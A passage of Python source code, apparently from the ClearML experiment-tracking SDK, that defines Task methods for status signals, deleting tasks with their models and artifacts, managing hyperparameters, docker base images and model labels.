if task_type not in (self.TaskTypes.training.value, self.TaskTypes.testing.value) and \
not Session.check_min_api_version('2.8'):
print('WARNING: Changing task type to "{}" : '
'clearml-server does not support task type "{}", '
'please upgrade clearml-server.'.format(self.TaskTypes.training, task_type))
task_type = self.TaskTypes.training.value
project_id = None
if project_name:
project_id = get_or_create_project(self, project_name)
tags = [self._development_tag] if not running_remotely() else []
extra_properties = {'system_tags': tags} if Session.check_min_api_version('2.3') else {'tags': tags}
req = tasks.CreateRequest(
name=task_name or make_message('Anonymous task (%(user)s@%(host)s %(time)s)'),
type=tasks.TaskTypeEnum(task_type),
comment=created_msg,
project=project_id,
input={'view': {}},
**extra_properties
)
res = self.send(req)
return res.response.id if res else 'offline-{}'.format(str(uuid4()).replace("-", ""))
def _set_storage_uri(self, value):
value = value.rstrip('/') if value else None
self._storage_uri = StorageHelper.conform_url(value)
self.data.output.destination = self._storage_uri
self._edit(output_dest=self._storage_uri or ('' if Session.check_min_api_version('2.3') else None))
@property
def storage_uri(self):
# type: () -> Optional[str]
if self._storage_uri:
return self._storage_uri
if running_remotely():
return self.data.output.destination
else:
return None
@storage_uri.setter
def storage_uri(self, value):
# type: (str) -> ()
self._set_storage_uri(value)
@property
def task_id(self):
# type: () -> str
return self.id
@property
def name(self):
# type: () -> str
return self.data.name or ''
@name.setter
def name(self, value):
# type: (str) -> ()
self.set_name(value)
@property
def task_type(self):
# type: () -> str
return self.data.type
@property
def project(self):
# type: () -> str
return self.data.project
@property
def parent(self):
# type: () -> str
return self.data.parent
@property
def input_models_id(self):
# type: () -> Mapping[str, str]
if not Session.check_min_api_version("2.13"):
model_id = self._get_task_property('execution.model', raise_on_error=False)
return {'Input Model': model_id} if model_id else {}
input_models = self._get_task_property('models.input', default=[]) or []
return {m.name: m.model for m in input_models}
@property
def output_models_id(self):
# type: () -> Mapping[str, str]
if not Session.check_min_api_version("2.13"):
model_id = self._get_task_property('output.model', raise_on_error=False)
return {'Output Model': model_id} if model_id else {}
output_models = self._get_task_property('models.output', default=[]) or []
return {m.name: m.model for m in output_models}
@property
def comment(self):
# type: () -> str
return self.data.comment or ''
@comment.setter
def comment(self, value):
# type: (str) -> ()
self.set_comment(value)
@property
def cache_dir(self):
# type: () -> Path
""" The cache directory which is used to store the Task related files. """
return Path(get_cache_dir()) / self.id
@property
def status(self):
# type: () -> str
"""
The Task's status. To keep the Task updated, ClearML reloads the Task status
information only when this value is accessed.
:return str: TaskStatusEnum status
"""
return self.get_status()
@property
def _status(self):
# type: () -> str
""" Return the task's cached status (don't reload if we don't have to) """
return str(self.data.status)
def reload(self):
# type: () -> ()
"""
Reload current Task's state from clearml-server.
Refresh all task's fields, including artifacts / models / parameters etc.
"""
return super(Task, self).reload()
def _get_output_model(self, upload_required=True, model_id=None):
# type: (bool, Optional[str]) -> Model
return Model(
session=self.session,
model_id=model_id or None,
cache_dir=self.cache_dir,
upload_storage_uri=self.storage_uri or self.get_output_destination(
raise_on_error=upload_required, log_on_error=upload_required),
upload_storage_suffix=self._get_output_destination_suffix('models'),
log=self.log)
@property
def metrics_manager(self):
# type: () -> Metrics
""" A metrics manager used to manage the metrics related to this task """
return self._get_metrics_manager(self.get_output_destination())
@property
def _reporter(self):
# type: () -> Reporter
"""
Returns a simple metrics reporter instance.
"""
if self.__reporter is None:
self._setup_reporter()
return self.__reporter
def _get_metrics_manager(self, storage_uri):
# type: (str) -> Metrics
if self._metrics_manager is None:
self._metrics_manager = Metrics(
session=self.session,
task=self,
storage_uri=storage_uri,
storage_uri_suffix=self._get_output_destination_suffix('metrics'),
iteration_offset=self.get_initial_iteration()
)
return self._metrics_manager
def _setup_reporter(self):
# type: () -> Reporter
try:
storage_uri = self.get_output_destination(log_on_error=False)
except ValueError:
storage_uri = None
self.__reporter = Reporter(
metrics=self._get_metrics_manager(storage_uri=storage_uri), task=self)
return self.__reporter
def _get_output_destination_suffix(self, extra_path=None):
# type: (Optional[str]) -> str
return '/'.join(quote(x, safe="'[]{}()$^,.; -_+-=") for x in
(self.get_project_name(), '%s.%s' % (self.name, self.data.id), extra_path) if x)
def _reload(self):
# type: () -> Any
""" Reload the task object from the backend """
with self._edit_lock:
if self._offline_mode:
# noinspection PyBroadException
try:
with open((self.get_offline_mode_folder() / self._offline_filename).as_posix(), 'rt') as f:
stored_dict = json.load(f)
stored_data = tasks.Task(**stored_dict)
# add missing entries
for k, v in stored_dict.items():
if not hasattr(stored_data, k):
setattr(stored_data, k, v)
if stored_dict.get('project_name'):
self._project_name = (None, stored_dict.get('project_name'))
except Exception:
stored_data = self._data
return stored_data or tasks.Task(
execution=tasks.Execution(
parameters={}, artifacts=[], dataviews=[], model='',
model_desc={}, model_labels={}, docker_cmd=''),
output=tasks.Output())
if self._reload_skip_flag and self._data:
return self._data
res = self.send(tasks.GetByIdRequest(task=self.id))
return res.response.task
def reset(self, set_started_on_success=True, force=False):
# type: (bool, bool) -> ()
"""
Reset the task. Task will be reloaded following a successful reset.
:param set_started_on_success: If True, automatically set the Task status to started after resetting it.
:param force: If False, the call fails if the task status is 'completed'
"""
self.send(tasks.ResetRequest(task=self.id, force=force))
if set_started_on_success:
self.started()
elif self._data:
# if not started, make sure the current cached state is synced
self._data.status = self.TaskStatusEnum.created
self.reload()
def started(self, ignore_errors=True, force=False):
# type: (bool, bool) -> ()
""" The signal that this Task started. """
return self.send(tasks.StartedRequest(self.id, force=force), ignore_errors=ignore_errors)
def stopped(self, ignore_errors=True, force=False, status_reason=None):
# type: (bool, bool, Optional[str]) -> ()
""" The signal that this Task stopped. """
return self.send(
tasks.StoppedRequest(self.id, force=force, status_reason=status_reason),
ignore_errors=ignore_errors
)
def completed(self, ignore_errors=True):
# type: (bool) -> ()
"""
.. note:: Deprecated, use mark_completed(...) instead
"""
warnings.warn("'completed' is deprecated; use 'mark_completed' instead.", DeprecationWarning)
return self.mark_completed(ignore_errors=ignore_errors)
def mark_completed(self, ignore_errors=True, status_message=None, force=False):
# type: (bool, Optional[str], bool) -> ()
""" The signal indicating that this Task completed. """
if hasattr(tasks, 'CompletedRequest') and callable(tasks.CompletedRequest):
return self.send(
tasks.CompletedRequest(self.id, status_reason='completed', status_message=status_message, force=force),
ignore_errors=ignore_errors
)
return self.send(
tasks.StoppedRequest(self.id, status_reason='completed', status_message=status_message, force=force),
ignore_errors=ignore_errors
)
def mark_failed(self, ignore_errors=True, status_reason=None, status_message=None, force=False):
# type: (bool, Optional[str], Optional[str], bool) -> ()
""" The signal that this Task stopped. """
return self.send(
tasks.FailedRequest(
task=self.id, status_reason=status_reason, status_message=status_message, force=force),
ignore_errors=ignore_errors,
)
def publish(self, ignore_errors=True):
# type: (bool) -> ()
""" The signal that this Task will be published """
if str(self.status) not in (str(tasks.TaskStatusEnum.stopped), str(tasks.TaskStatusEnum.completed)):
raise ValueError("Can't publish, Task is not stopped")
resp = self.send(tasks.PublishRequest(self.id), ignore_errors=ignore_errors)
assert isinstance(resp.response, tasks.PublishResponse)
return resp
def _delete(
self,
delete_artifacts_and_models=True,
skip_models_used_by_other_tasks=True,
raise_on_error=False,
):
# type: (bool, bool, bool) -> bool
"""
Delete the task as well as its output models and artifacts.
Models and artifacts are deleted from their storage locations, each using its URI.
Note: in order to delete models and artifacts using their URI, make sure the proper storage credentials are
configured in your configuration file (e.g. if an artifact is stored in S3, make sure sdk.aws.s3.credentials
are properly configured and that you have delete permission in the related buckets).
:param delete_artifacts_and_models: If True, artifacts and models will also be deleted (default True)
:param skip_models_used_by_other_tasks: If True, models used by other tasks will not be deleted (default True)
:param raise_on_error: If True, an exception will be raised when encountering an error.
If False, an error will be printed and no exception will be raised.
:return: True if the task was deleted successfully.
"""
try:
res = self.send(tasks.GetByIdRequest(self.task_id))
task = res.response.task
if task.status == Task.TaskStatusEnum.published:
if raise_on_error:
raise self.DeleteError("Cannot delete published task {}".format(self.task_id))
self.log.error("Cannot delete published task {}".format(self.task_id))
return False
execution = {}
models_res = []
if delete_artifacts_and_models:
execution = task.execution.to_dict() if task.execution else {}
models_res = self.send(
models.GetAllRequest(
task=[task.id], only_fields=["id", "uri"]
)
).response.models
event_uris = list(self._get_all_events(
event_type="training_debug_image", unique_selector=itemgetter("url"), batch_size=10000
))
event_uris.extend(self._get_image_plot_uris())
task_deleted = self.send(tasks.DeleteRequest(self.task_id, force=True))
if not task_deleted:
if raise_on_error:
raise self.DeleteError("Failed deleting task {}".format(self.task_id))
self.log.error("Failed deleting task {}".format(self.task_id))
return False
except self.DeleteError:
raise
except Exception as ex:
if raise_on_error:
raise self.DeleteError("Task deletion failed: {}".format(ex))
self.log.error("Task deletion failed: {}".format(ex))
return False
failures = []
if delete_artifacts_and_models:
for e in execution["artifacts"]:
if e["mode"] == "output" and not self._delete_uri(e["uri"]):
failures.append(e["uri"])
for m in models_res:
# noinspection PyBroadException
try:
is_output_model = task.output and (m.id == task.output.model)
res = self.send(
models.DeleteRequest(m.id, force=(not skip_models_used_by_other_tasks)),
ignore_errors=is_output_model
)
# Should delete if the model was deleted, or if this was the output model (which was already deleted
# by DeleteRequest, and its URI is dangling)
should_delete = is_output_model or res.response.deleted
except SendError as ex:
if (ex.result.meta.result_code, ex.result.meta.result_subcode) == (400, 201):
# Model not found, already deleted by DeleteRequest
should_delete = True
else:
failures.append("model id: {}".format(m.id))
continue
except Exception:
failures.append("model id: {}".format(m.id))
continue
if should_delete and not self._delete_uri(m.uri):
failures.append(m.uri)
event_uris = list(filter(None, event_uris))
for uri in event_uris:
if not self._delete_uri(uri):
failures.append(uri)
failures = list(filter(None, failures))
if len(failures):
error = "Failed deleting the following URIs:\n{}".format(
"\n".join(failures)
)
if raise_on_error:
raise self.DeleteError(error)
self.log.error(error)
return task_deleted
def _delete_uri(self, uri):
# type: (str) -> bool
# noinspection PyBroadException
try:
deleted = StorageHelper.get(uri).delete(uri)
if deleted:
self.log.debug("Deleted file: {}".format(uri))
return True
except Exception as ex:
self.log.error("Failed deleting {}: {}".format(uri, str(ex)))
return False
return False
def _get_image_plot_uris(self):
# type: () -> Set[str]
def image_source_selector(d):
plot = d.get("plot_str")
if plot:
# noinspection PyBroadException
try:
plot = json.loads(plot)
return next(
filter(None, (image.get("source") for image in plot.get("layout", {}).get("images", []))),
None
)
except Exception:
pass
return self._get_all_events(
event_type="plot",
unique_selector=image_source_selector,
batch_size=10000
)
def update_model_desc(self, new_model_desc_file=None):
# type: (Optional[str]) -> ()
""" Change the Task's model description. """
with self._edit_lock:
self.reload()
execution = self._get_task_property('execution')
p = Path(new_model_desc_file)
if not p.is_file():
raise IOError('model_desc file %s cannot be found' % new_model_desc_file)
new_model_desc = p.read_text()
model_desc_key = list(execution.model_desc.keys())[0] if execution.model_desc else 'design'
execution.model_desc[model_desc_key] = new_model_desc
res = self._edit(execution=execution)
return res.response
def update_output_model(
self,
model_path, # type: str
name=None, # type: Optional[str]
comment=None, # type: Optional[str]
tags=None, # type: Optional[Sequence[str]]
model_name=None, # type: Optional[str]
iteration=None, # type: Optional[int]
):
# type: (...) -> str
"""
Update the Task's output model weights file. First, ClearML uploads the file to the preconfigured output
destination (see the Task's ``output.destination`` property, or call the ``setup_upload`` method),
then ClearML updates the model object associated with the Task via an API call. The API call uses
the URI of the uploaded file, along with other values provided by additional arguments.
:param model_path: A local weights file or folder to be uploaded.
If a remote URI is provided (e.g. http:// or s3:// etc.), the URI is stored as-is, without any upload
:param name: The updated model name.
If not provided, the name is the filename of the model weights file, without the extension.
:param comment: The updated model description. (Optional)
:param tags: The updated model tags. (Optional)
:param model_name: If provided, the model name as it will appear in the model artifactory. (Optional)
Default: Task.name - name
:param iteration: iteration number for the current stored model (Optional)
:return: The URI of the uploaded weights file.
Notice: the upload is done in a background thread; the function call returns immediately
"""
from ...model import OutputModel
output_model = OutputModel(
task=self,
name=model_name or ('{} - {}'.format(self.name, name) if name else self.name),
tags=tags,
comment=comment
)
output_model.connect(task=self, name=name)
url = output_model.update_weights(weights_filename=model_path, iteration=iteration)
return url
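# Illustrative usage sketch (hypothetical paths/names; assumes an initialized Task instance `task`):
#     uri = task.update_output_model(
#         model_path='/tmp/model_weights.pt', name='best checkpoint',
#         comment='after epoch 10', tags=['resnet'], iteration=10)
#     # `uri` is the destination URI; the actual upload runs in a background thread.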
@property
def labels_stats(self):
# type: () -> dict
""" Get accumulated label stats for the current/last frames iteration """
return self._curr_label_stats
def _accumulate_label_stats(self, roi_stats, reset=False):
# type: (dict, bool) -> ()
if reset:
self._curr_label_stats = {}
for label in roi_stats:
if label in self._curr_label_stats:
self._curr_label_stats[label] += roi_stats[label]
else:
self._curr_label_stats[label] = roi_stats[label]
def set_input_model(
self,
model_id=None,
model_name=None,
update_task_design=True,
update_task_labels=True,
name=None
):
# type: (str, Optional[str], bool, bool, Optional[str]) -> ()
"""
Set a new input model for the Task. The model must be "ready" (status is ``Published``) to be used as the
Task's input model.
:param model_id: The Id of the model on the **ClearML Server** (backend). If ``model_name`` is not specified,
then ``model_id`` must be specified.
:param model_name: The model name in the artifactory. The model_name is used to locate an existing model
in the **ClearML Server** (backend). If ``model_id`` is not specified,
then ``model_name`` must be specified.
:param update_task_design: Update the Task's design
- ``True`` - ClearML copies the Task's model design from the input model.
- ``False`` - ClearML does not copy the Task's model design from the input model.
:param update_task_labels: Update the Task's label enumeration
- ``True`` - ClearML copies the Task's label enumeration from the input model.
- ``False`` - ClearML does not copy the Task's label enumeration from the input model.
:param name: Model section name to be stored on the Task (unrelated to the model object name itself)
Default: the model weights filename is used (excluding the file extension)
"""
if model_id is None and not model_name:
raise ValueError('Expected one of [model_id, model_name]')
if model_name and not model_id:
# Try getting the model by name. Limit to 10 results.
res = self.send(
models.GetAllRequest(
name=exact_match_regex(model_name),
ready=True,
page=0,
page_size=10,
order_by=['-created'],
only_fields=['id', 'created', 'uri']
)
)
model = get_single_result(entity='model', query=model_name, results=res.response.models, log=self.log)
model_id = model.id
if model_id:
res = self.send(models.GetByIdRequest(model=model_id))
model = res.response.model
if not model.ready:
# raise ValueError('Model %s is not published (not ready)' % model_id)
self.log.debug('Model %s [%s] is not published yet (not ready)' % (model_id, model.uri))
name = name or Path(model.uri).stem
else:
# clear the input model
model = None
model_id = ''
name = name or 'Input Model'
with self._edit_lock:
self.reload()
# store model id
if Session.check_min_api_version("2.13"):
self.send(tasks.AddOrUpdateModelRequest(
task=self.id, name=name, model=model_id, type=tasks.ModelTypeEnum.input
))
else:
# backwards compatibility
self._set_task_property("execution.model", model_id, raise_on_error=False, log_on_error=False)
# Auto populate from model, if empty
if update_task_labels and not self.data.execution.model_labels:
self.data.execution.model_labels = model.labels if model else {}
self._edit(execution=self.data.execution)
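# Illustrative usage sketch (hypothetical model name/id; assumes an initialized Task instance `task`):
#     task.set_input_model(model_name='my published model')  # locate a ready model by name
#     task.set_input_model(model_id='')                      # clear the Task's input model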
def get_parameters(self, backwards_compatibility=True):
# type: (bool) -> (Optional[dict])
"""
Get the parameters for a Task. This method returns a complete group of key-value parameter pairs, but does not
support parameter descriptions (the result is a dictionary of key-value pairs).
Notice the returned parameter dict is flat:
i.e. {'Args/param': 'value'} is the argument "param" from section "Args"
:param backwards_compatibility: If True (default), parameters without a section name
(API version < 2.9, clearml-server < 0.16) will be at the dict root level.
If False, parameters without a section name will be nested under the "Args/" key.
:return: dict of the task parameters, all flattened to key/value.
Different sections with key prefix "section/"
"""
if not Session.check_min_api_version('2.9'):
return self._get_task_property('execution.parameters')
# The API makes sure we get old parameters with type 'legacy' at the top level (instead of nested under Args)
parameters = dict()
hyperparams = self._get_task_property('hyperparams') or {}
if not backwards_compatibility:
for section in hyperparams:
for key, section_param in hyperparams[section].items():
parameters['{}/{}'.format(section, key)] = section_param.value
else:
for section in hyperparams:
for key, section_param in hyperparams[section].items():
if section_param.type == 'legacy' and section in (self._legacy_parameters_section_name, ):
parameters['{}'.format(key)] = section_param.value
else:
parameters['{}/{}'.format(section, key)] = section_param.value
return parameters
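# Illustrative sketch of the flat parameter layout returned by get_parameters()
# (hypothetical keys/values; assumes an initialized Task instance `task`):
#     params = task.get_parameters()
#     # e.g. {'Args/batch_size': '32', 'Args/lr': '0.001'} - section prefix 'Args/', values as strings
#     batch_size = params.get('Args/batch_size')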
def set_parameters(self, *args, **kwargs):
# type: (*dict, **Any) -> ()
"""
Set the parameters for a Task. This method sets a complete group of key-value parameter pairs, but does not
support parameter descriptions (the input is a dictionary of key-value pairs).
Notice the parameter dict is flat:
i.e. {'Args/param': 'value'} will set the argument "param" in section "Args" to "value"
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
"""
return self._set_parameters(*args, __update=False, **kwargs)
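# Illustrative usage sketch (hypothetical values): dicts, (key, value) iterables and keyword
# arguments are merged into a single flat parameter dict, replacing the existing parameters:
#     task.set_parameters({'Args/batch_size': 32}, [('Args/epochs', 10)])
#     # stored as {'Args/batch_size': '32', 'Args/epochs': '10'} - values are cast to strings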
def _set_parameters(self, *args, **kwargs):
# type: (*dict, **Any) -> ()
"""
Set the parameters for a Task. This method sets a complete group of key-value parameter pairs, but does not
support parameter descriptions (the input is a dictionary of key-value pairs).
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
"""
def stringify(value):
# return empty string if value is None
if value is None:
return ""
str_value = str(value)
if isinstance(value, (tuple, list, dict)):
if 'None' in re.split(r'[ ,\[\]{}()]', str_value):
# If we have None in the string we have to use json to replace it with null,
# otherwise we end up with None as string when running remotely
try:
str_json = json.dumps(value)
# verify we actually have a null in the string, otherwise prefer the str cast
# This is because we prefer to have \' as in str and not \" used in json
if 'null' in re.split(r'[ ,\[\]{}()]', str_json):
return str_json
except TypeError:
# if we somehow failed to json serialize, revert to previous std casting
pass
elif any('\\' in str(v) for v in value):
try:
str_json = json.dumps(value)
return str_json
except TypeError:
pass
return str_value
if not all(isinstance(x, (dict, Iterable)) for x in args):
raise ValueError('only dict or iterable are supported as positional arguments')
prefix = kwargs.pop('__parameters_prefix', None)
descriptions = kwargs.pop('__parameters_descriptions', None) or dict()
params_types = kwargs.pop('__parameters_types', None) or dict()
update = kwargs.pop('__update', False)
# new parameters dict
new_parameters = dict(itertools.chain.from_iterable(x.items() if isinstance(x, dict) else x for x in args))
new_parameters.update(kwargs)
if prefix:
prefix = prefix.strip('/')
new_parameters = dict(('{}/{}'.format(prefix, k), v) for k, v in new_parameters.items())
# verify parameters type:
not_allowed = {
k: type(v).__name__
for k, v in new_parameters.items()
if not verify_basic_type(v, self._parameters_allowed_types)
}
if not_allowed:
self.log.warning(
"Skipping parameter: {}, only builtin types are supported ({})".format(
', '.join('%s[%s]' % p for p in not_allowed.items()),
', '.join(t.__name__ for t in self._parameters_allowed_types))
)
new_parameters = {k: v for k, v in new_parameters.items() if k not in not_allowed}
use_hyperparams = Session.check_min_api_version('2.9')
with self._edit_lock:
self.reload()
# if we have a specific prefix, we use hyperparameters, and this is a set (not an update),
# overwrite only the prefixed section and leave the rest as is.
if not update and prefix:
parameters = copy(self.get_parameters() or {})
parameters = dict((k, v) for k, v in parameters.items() if not k.startswith(prefix+'/'))
elif update:
parameters = copy(self.get_parameters() or {})
else:
parameters = dict()
parameters.update(new_parameters)
if use_hyperparams:
# build nested dict from flat parameters dict:
org_hyperparams = self.data.hyperparams or {}
hyperparams = dict()
# if the task is a legacy task, we should put everything back under Args/key with legacy type
legacy_name = self._legacy_parameters_section_name
org_legacy_section = org_hyperparams.get(legacy_name, dict())
for k, v in parameters.items():
# legacy variable
if org_legacy_section.get(k, tasks.ParamsItem()).type == 'legacy':
section = hyperparams.get(legacy_name, dict())
section[k] = copy(org_legacy_section[k])
section[k].value = stringify(v)
description = descriptions.get(k)
if description:
section[k].description = description
hyperparams[legacy_name] = section
continue
org_k = k
if '/' not in k:
k = '{}/{}'.format(self._default_configuration_section_name, k)
section_name, key = k.split('/', 1)
section = hyperparams.get(section_name, dict())
org_param = org_hyperparams.get(section_name, dict()).get(key, None)
param_type = params_types[org_k] if org_k in params_types else (
org_param.type if org_param is not None else type(v) if v is not None else None
)
if param_type and not isinstance(param_type, str):
param_type = param_type.__name__ if hasattr(param_type, '__name__') else str(param_type)
section[key] = tasks.ParamsItem(
section=section_name, name=key,
value=stringify(v),
description=descriptions[org_k] if org_k in descriptions else (
org_param.description if org_param is not None else None
),
type=param_type,
)
hyperparams[section_name] = section
self._edit(hyperparams=hyperparams)
self.data.hyperparams = hyperparams
else:
# force cast all variables to strings (so that we can later edit them in UI)
parameters = {k: stringify(v) for k, v in parameters.items()}
execution = self.data.execution
if execution is None:
execution = tasks.Execution(
parameters=parameters, artifacts=[], dataviews=[], model='',
model_desc={}, model_labels={}, docker_cmd='')
else:
execution.parameters = parameters
self._edit(execution=execution)
def set_parameter(self, name, value, description=None, value_type=None):
# type: (str, str, Optional[str], Optional[Any]) -> ()
"""
Set a single Task parameter. This overrides any previous value for this parameter.
:param name: The parameter name.
:param value: The parameter value.
:param description: The parameter description.
:param value_type: The type of the parameter (cast to string and stored)
"""
if not Session.check_min_api_version('2.9'):
# not supported yet
description = None
value_type = None
self._set_parameters(
{name: value}, __update=True,
__parameters_descriptions={name: description},
__parameters_types={name: value_type}
)
def get_parameter(self, name, default=None):
# type: (str, Any) -> Any
"""
Get a value for a parameter.
:param name: Parameter name
:param default: Default value
:return: The Parameter value (or default value if parameter is not defined).
"""
params = self.get_parameters()
return params.get(name, default)
def delete_parameter(self, name):
# type: (str) -> bool
"""
Delete a parameter by its full name, i.e. Section/name.
:param name: Parameter name in full, i.e. Section/name. For example, 'Args/batch_size'
:return: True if the parameter was deleted successfully
"""
if not Session.check_min_api_version('2.9'):
raise ValueError(
"Delete hyper-parameter is not supported by your clearml-server, "
"upgrade to the latest version")
with self._edit_lock:
paramkey = tasks.ParamKey(section=name.split('/', 1)[0], name=name.split('/', 1)[1])
res = self.send(tasks.DeleteHyperParamsRequest(
task=self.id, hyperparams=[paramkey]), raise_on_errors=False)
self.reload()
return res.ok()
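# Illustrative usage sketch tying the single-parameter helpers together (hypothetical names):
#     task.set_parameter('Args/batch_size', 32, description='training batch size', value_type=int)
#     value = task.get_parameter('Args/batch_size', default=64)
#     ok = task.delete_parameter('Args/batch_size')  # requires clearml-server API >= 2.9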
def update_parameters(self, *args, **kwargs):
# type: (*dict, **Any) -> ()
"""
Update the parameters for a Task. This method updates a complete group of key-value parameter pairs, but does
not support parameter descriptions (the input is a dictionary of key-value pairs).
Notice the parameter dict is flat:
i.e. {'Args/param': 'value'} will set the argument "param" in section "Args" to "value"
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
"""
self._set_parameters(*args, __update=True, **kwargs)
def set_model_label_enumeration(self, enumeration=None):
# type: (Mapping[str, int]) -> ()
"""
Set a dictionary of labels (text) to ids (integers) {str(label): integer(id)}
:param dict enumeration: For example: {str(label): integer(id)}
"""
enumeration = enumeration or {}
with self._edit_lock:
self.reload()
execution = self.data.execution
if not (isinstance(enumeration, dict)
and all(isinstance(k, six.string_types) and isinstance(v, int) for k, v in enumeration.items())):
raise ValueError('Expected label to be a dict[str => int]')
execution.model_labels = enumeration
self._edit(execution=execution)
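# Illustrative usage sketch (hypothetical labels):
#     task.set_model_label_enumeration({'background': 0, 'person': 1, 'car': 2})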
def _set_default_docker_image(self):
# type: () -> ()
if not DOCKER_IMAGE_ENV_VAR.exists() and not DOCKER_BASH_SETUP_ENV_VAR.exists():
return
self.set_base_docker(
docker_cmd=DOCKER_IMAGE_ENV_VAR.get(default=""),
docker_setup_bash_script=DOCKER_BASH_SETUP_ENV_VAR.get(default=""))
def set_base_docker(self, docker_cmd, docker_arguments=None, docker_setup_bash_script=None):
# type: (str, Optional[Union[str, Sequence[str]]], Optional[Union[str, Sequence[str]]]) -> ()
"""
Set the base docker image for this experiment
If provided, this value will be used by clearml-agent to execute this experiment
inside the provided docker image.
When running remotely the call is ignored
:param docker_cmd: docker container image (example: 'nvidia/cuda:11.1')
:param docker_arguments: docker execution parameters (example: '-e ENV=1')
:param docker_setup_bash_script: bash script to run at the
beginning of the docker before launching the Task itself. example: ['apt update', 'apt-get install -y gcc']
"""
image = docker_cmd.split(' ')[0] if docker_cmd else ''
if not docker_arguments and docker_cmd:
docker_arguments = docker_cmd.split(' ')[1:] if len(docker_cmd.split(' ')) > 1 else ''
arguments = (docker_arguments if isinstance(docker_arguments, str) else ' '.join(docker_arguments)) \
if docker_arguments else ''
if docker_setup_bash_script:
setup_shell_script = docker_setup_bash_script \
if isinstance(docker_setup_bash_script, str) else '\n'.join(docker_setup_bash_script)
else:
setup_shell_script = ''
with self._edit_lock:
self.reload()
if Session.check_min_api_version("2.13"):
self.data.container = dict(image=image, arguments=arguments, setup_shell_script=setup_shell_script)
self._edit(container=self.data.container)
else:
if setup_shell_script:
raise ValueError(
"Your ClearML-server does not support docker bash script feature, please upgrade.")
execution = self.data.execution
execution.docker_cmd = image + (' {}'.format(arguments) if arguments else '')
self._edit(execution=execution)
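# Illustrative usage sketch, mirroring the docstring examples:
#     task.set_base_docker(
#         docker_cmd='nvidia/cuda:11.1 -e ENV=1',  # image plus optional execution parameters
#         docker_setup_bash_script=['apt update', 'apt-get install -y gcc'])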
def get_base_docker(self):
# type: () -> str
"""Get the base Docker command (image) that is set for this experiment."""
if Session.check_min_api_version("2.13"):
# backwards compatibility
container = self._get_task_property(
"container", raise_on_error=False, log_on_error=False, default={})
return (container.get('image', '') +
(' {}'.format(container['arguments']) if container.get('arguments', '') else '')) or None
else:
return self._get_task_property("execution.docker_cmd", raise_on_error=False, log_on_error=False)
def set_artifacts(self, artifacts_list=None):
# type: (Sequence[tasks.Artifact]) -> Optional[List[tasks.Artifact]]
"""
Update the Task with the given list of artifacts (tasks.Artifact), replacing artifacts with matching keys.
:param list artifacts_list: list of artifacts (type tasks.Artifact)
:return: List of current Task's Artifacts or None if error.
"""
if not Session.check_min_api_version('2.3'):
return None
if not (isinstance(artifacts_list, (list, tuple))
and all(isinstance(a, tasks.Artifact) for a in artifacts_list)):
raise ValueError('Expected artifacts as List[tasks.Artifact]')
with self._edit_lock:
self.reload()
execution = self.data.execution
keys = [a.key for a in artifacts_list]
execution.artifacts = [a for a in execution.artifacts or [] if a.key not in keys] + artifacts_list
self._edit(execution=execution)
return execution.artifacts or []
def _add_artifacts(self, artifacts_list):
# type: (Sequence[tasks.Artifact]) -> Optional[List[tasks.Artifact]]
"""
Add a list of artifacts (tasks.Artifact) to the task.
If an artifact with the same name already exists, it will overwrite the existing artifact.
:param list artifacts_list: list of artifacts (type tasks.Artifact)
:return: List of current Task's Artifacts
"""
if not Session.check_min_api_version('2.3'):
return None
if not (isinstance(artifacts_list, (list, tuple))
and all(isinstance(a, tasks.Artifact) for a in artifacts_list)):
raise ValueError('Expected artifacts as List[tasks.Artifact]')
with self._edit_lock:
if Session.check_min_api_version("2.13") and not self._offline_mode:
req = tasks.AddOrUpdateArtifactsRequest(task=self.task_id, artifacts=artifacts_list, force=True)
res = self.send(req, raise_on_errors=False)
if not res or not res.response or not res.response.updated:
return None
self.reload()
else:
self.reload()
execution = self.data.execution
keys = [a.key for a in artifacts_list]
execution.artifacts = [a for a in execution.artifacts or [] if a.key not in keys] + artifacts_list
self._edit(execution=execution)
return self.data.execution.artifacts or []
def _delete_artifacts(self, artifact_names):
# type: (Sequence[str]) -> bool
"""
Delete a list of artifacts, by artifact name, from the Task.
:param list artifact_names: list of artifact names
:return: True if successful
"""
if not Session.check_min_api_version('2.3'):
return False
if not isinstance(artifact_names, (list, tuple)):
raise ValueError('Expected artifact names as List[str]')
with self._edit_lock:
if Session.check_min_api_version("2.13") and not self._offline_mode:
req = tasks.DeleteArtifactsRequest(
task=self.task_id, artifacts=[{"key": n, "mode": "output"} for n in artifact_names], force=True)
res = self.send(req, raise_on_errors=False)
if not res or not res.response or not res.response.deleted:
return False
self.reload()
else:
self.reload()
execution = self.data.execution
execution.artifacts = [a for a in execution.artifacts or [] if a.key not in artifact_names]
self._edit(execution=execution)
return True
def _set_model_design(self, design=None):
# type: (str) -> ()
with self._edit_lock:
self.reload()
if Session.check_min_api_version('2.9'):
configuration = self._get_task_property(
"configuration", default={}, raise_on_error=False, log_on_error=False) or {}
configuration[self._default_configuration_section_name] = tasks.ConfigurationItem(
name=self._default_configuration_section_name, value=str(design))
self._edit(configuration=configuration)
else:
execution = self.data.execution
if design is not None:
# noinspection PyProtectedMember
execution.model_desc = Model._wrap_design(design)
self._edit(execution=execution)
def get_labels_enumeration(self):
# type: () -> Mapping[str, int]
"""
Get the label enumeration dictionary of string (label) to integer (value) pairs.
:return: A dictionary containing the label enumeration.
"""
if not self.data or not self.data.execution:
return {}
return self.data.execution.model_labels
def get_model_design(self):
# type: () -> str
"""
Get the model configuration as blob of text.
:return: The model configuration as blob of text.
"""
if Session.check_min_api_version('2.9'):
design = self._get_task_property(
"configuration", default={}, raise_on_error=False, log_on_error=False) or {}
if design:
design = design.get(sorted(design.keys())[0]).value or ''
else:
design = self._get_task_property(
"execution.model_desc", default={}, raise_on_error=False, log_on_error=False)
# noinspection PyProtectedMember
return Model._unwrap_design(design)
def get_random_seed(self):
# type: () -> int
# fixed seed for the time being
return 1337
def set_random_seed(self, random_seed):
# type: (int) -> ()
# fixed seed for the time being
pass
def set_project(self, project_id=None, project_name=None):
# type: (Optional[str], Optional[str]) -> ()
# if running remotely and we are the main task, skip setting ourselves.
if self._is_remote_main_task():
return
if not project_id:
assert isinstance(project_name, six.string_types)
